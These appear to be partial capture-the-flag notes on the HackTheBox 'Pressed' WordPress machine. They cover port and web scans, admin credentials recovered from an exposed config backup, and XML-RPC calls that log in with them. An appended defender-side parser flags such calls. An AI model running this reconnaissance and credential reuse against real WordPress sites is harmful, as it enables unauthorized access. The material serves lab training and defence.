1. Nmap
sudo nmap -p- -sC -sV --vv pressed.htb -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 17:29 WEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
Initiating Ping Scan at 17:29
Scanning pressed.htb (10.129.136.28) [4 ports]
Completed Ping Scan at 17:29, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 17:29
Scanning pressed.htb (10.129.136.28) [65535 ports]
Discovered open port 80/tcp on 10.129.136.28
SYN Stealth Scan Timing: About 37.02% done; ETC: 17:31 (0:00:53 remaining)
Completed SYN Stealth Scan at 17:30, 59.44s elapsed (65535 total ports)
Initiating Service scan at 17:30
Scanning 1 service on pressed.htb (10.129.136.28)
Completed Service scan at 17:30, 7.27s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.136.28.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:30
Completed NSE at 17:30, 5.06s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:30
Completed NSE at 17:31, 2.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
Nmap scan report for pressed.htb (10.129.136.28)
Host is up, received echo-reply ttl 63 (0.039s latency).
Scanned at 2025-06-12 17:29:47 WEST for 74s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: UHC Jan Finals – New Month, New Boxes
|_http-generator: WordPress 5.9
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.38 seconds
Raw packets sent: 131117 (5.769MB) | Rcvd: 43 (1.876KB)
2. Port 80
WhatWeb
whatweb http://pressed.htb
http://pressed.htb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.136.28], JQuery[3.6.0], MetaGenerator[WordPress 5.9], Script[text/javascript], Title[UHC Jan Finals – New Month, New Boxes], UncommonHeaders[link], WordPress[5.9]
WordPress
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[+] URL: http://pressed.htb/ [10.129.136.28]
[+] Started: Thu Jun 12 17:31:59 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://pressed.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://pressed.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://pressed.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://pressed.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.9 identified (Insecure, released on 2022-01-25).
| Found By: Rss Generator (Passive Detection)
| - http://pressed.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.9</generator>
| - http://pressed.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.9</generator>
[+] WordPress theme in use: retrogeek
| Location: http://pressed.htb/wp-content/themes/retrogeek/
| Last Updated: 2024-04-26T00:00:00.000Z
| Readme: http://pressed.htb/wp-content/themes/retrogeek/README.txt
| [!] The version is out of date, the latest version is 0.7
| Style URL: http://pressed.htb/wp-content/themes/retrogeek/style.css?ver=42
| Style Name: RetroGeek
| Style URI: https://tuxlog.de/retrogeek/
| Description: A lightweight, minimal, fast and geeky retro theme remembering the good old terminal times...
| Author: tuxlog
| Author URI: https://tuxlog.de/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 0.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://pressed.htb/wp-content/themes/retrogeek/style.css?ver=42, Match: 'Version: 0.5'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <===============================================================> (137 / 137) 100.00% Time: 00:00:01
[i] Config Backup(s) Identified:
[!] http://pressed.htb/wp-config.php.bak
| Found By: Direct Access (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Jun 12 17:32:07 2025
[+] Requests Done: 173
[+] Cached Requests: 5
[+] Data Sent: 42.833 KB
[+] Data Received: 125.936 KB
[+] Memory used: 262.746 MB
[+] Elapsed time: 00:00:08
WPScan identified a config backup file: http://pressed.htb/wp-config.php.bak
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://pressed.htb/FUZZ
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://pressed.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# [Status: 200, Size: 22430, Words: 1175, Lines: 185, Duration: 123ms]
# directory-list-2.3-small.txt [Status: 200, Size: 22430, Words: 1175, Lines: 185, Duration: 130ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 22430, Words: 1175, Lines: 185, Duration: 130ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 290ms]
wp-content [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 39ms]
# on at least 3 different hosts [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 1282ms]
# [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 2292ms]
wp-includes [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 39ms]
# Priority-ordered case-sensitive list, where entries were found [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 3308ms]
# Copyright 2007 James Fisher [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 3315ms]
# [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 3316ms]
# [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 4080ms]
[Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 4087ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 4326ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 4338ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 4339ms]
wp-admin [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 38ms]
[Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 81ms]
:: Progress: [87664/87664] :: Job [1/1] :: 1020 req/sec :: Duration: [0:01:40] :: Errors: 0 ::
Creds found: admin:uhc-jan-finals-2021
These creds do not work. Changing the year:
admin:uhc-jan-finals-2022 worked, and the login then asked for an OTP.
The XML-RPC endpoint (xmlrpc.php) is also exposed, and we can interact with it:
import xmlrpc.client
# Replace with the XML-RPC server's address
server = xmlrpc.client.ServerProxy('http://pressed.htb/xmlrpc.php')
# Call a method on the server
result = server.system.listMethods()
print(result)
- Found htb.get_flag() in the returned method list
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param>
<value><string>admin</string></value>
</param>
<param>
<value><string>uhc-jan-finals-2022</string></value>
</param>
</params>
</methodCall>
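Added example (not part of the original notes): a defender-side parser for request bodies like the wp.getUsersBlogs call above, reporting which XML-RPC method was called and whether it carried a username, without ever logging the password. The helper names, source IPs and sample bodies are constructed, and the core namespace list is an assumption about what WordPress core registers.

```python
import xmlrpc.client

# Assumption: namespaces registered by WordPress core; others are custom/plugin.
CORE_NAMESPACES = {"system", "wp", "blogger", "metaWeblog", "mt", "pingback", "demo"}
# Index of the username parameter; wp.getUsersBlogs takes (username, password).
USERNAME_INDEX = {"wp.getUsersBlogs": 0}
MAX_BODY = 64 * 1024  # refuse oversized bodies before handing them to the parser


def summarize_call(body):
    """Parse one XML-RPC request body into a log-safe summary (no password)."""
    if len(body) > MAX_BODY:
        return {"error": "body too large"}
    try:
        params, method = xmlrpc.client.loads(body)
    except Exception as exc:  # malformed XML, a fault, or not XML-RPC at all
        return {"error": type(exc).__name__}
    if method is None:  # a methodResponse, not a request
        return {"error": "not a methodCall"}
    idx = USERNAME_INDEX.get(method)
    username = params[idx] if idx is not None and len(params) > idx else None
    return {"method": method, "core": method.split(".", 1)[0] in CORE_NAMESPACES,
            "carries_credentials": username is not None, "username": username}


def review(requests):
    """Return alert lines for credentialed, non-core or unparsable calls."""
    alerts = []
    for src, body in requests:
        s = summarize_call(body)
        if "error" in s:
            alerts.append(f"{src} unparsable xmlrpc body ({s['error']})")
        elif s["carries_credentials"]:
            alerts.append(f"{src} credentialed call {s['method']} as {s['username']!r}")
        elif not s["core"]:
            alerts.append(f"{src} non-core method {s['method']}")
    return alerts


# Constructed sample traffic: (source IP, request body) pairs.
SAMPLE_REQUESTS = [
    ("203.0.113.7", xmlrpc.client.dumps((), methodname="system.listMethods")),
    ("203.0.113.7", xmlrpc.client.dumps(("admin", "constructed-password"),
                                         methodname="wp.getUsersBlogs")),
    ("203.0.113.7", xmlrpc.client.dumps((), methodname="htb.get_flag")),
    ("198.51.100.9", "<methodCall>"),  # truncated body
]

if __name__ == "__main__":
    for line in review(SAMPLE_REQUESTS):
        print(line)
```

Feeding it the POST bodies sent to xmlrpc.php (from a reverse proxy or WAF that records them) gives a per-request view of password-bearing calls that never pass through the wp-login.php form.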
Try to see the userage page contents?